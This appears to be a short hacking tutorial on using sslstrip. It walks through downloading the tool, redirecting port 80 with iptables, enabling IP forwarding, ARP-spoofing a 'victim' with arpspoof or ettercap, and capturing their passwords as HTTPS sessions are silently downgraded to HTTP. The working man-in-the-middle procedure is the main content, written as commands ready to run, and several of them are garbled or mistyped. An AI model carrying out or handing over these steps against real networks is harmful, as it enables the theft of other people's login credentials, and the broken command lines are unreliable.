This is a very useful tool. Basically it ends the HTTPS session and forwards traffic through HTTP to the victim machine.
It is "created by Moxie Morlinspike who provides a demonstration of the HTTPS stripping attacks that presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial." -Taken from author website, see link at the bottom of the page-
This all happens on the fly, and is practically will invisible to users. The only thing that can be noticed is checking the URL in the address bar where normally it would display HTTPS, it will now display HTTP instead.
Download SSLSTRIP from http://www.thoughtcrime.org/software/sslstrip/
cd /pentest/exploits wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz tar xvzf sslstrip-0.9.tar.gz cd sslstrip-0.9/
optional:
python setup.py install
We need to set up a firewall rule (using iptables) if not already set up to redirect requests from port 80 to port 8080 to ensure our outgoing connections (from SSL Strip) get routed to the proper port.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Enable forwarding:
echo '1' > /proc/sys/net/ipv4/ip_forward
Start your SSL Strip by opening new terminal(CTRL+ALT+T)
sslstrip -l 8080
f you're in a network where ARP spoofing is necessary (switched ethernet network), then use arpspoof as well with ettercap capturing the passwords:
arpspoof -i eth0 192.168.8.8 ettercap -Tq -i eth0
Or use ettercap to do the ARP spoofing as well:
Edit /etc/etter.conf and uncomment iptables lines:
nano /etc/etter.conf
# if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"<br /> redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Start the capture with ettercap:
ettercap -Tql -wlan1 -M arp:remote // //
Links:
http://vishnuvalentino.com/hacking-tutorial/break-ssl-protection-using-sslstrip-and-backtrack-5/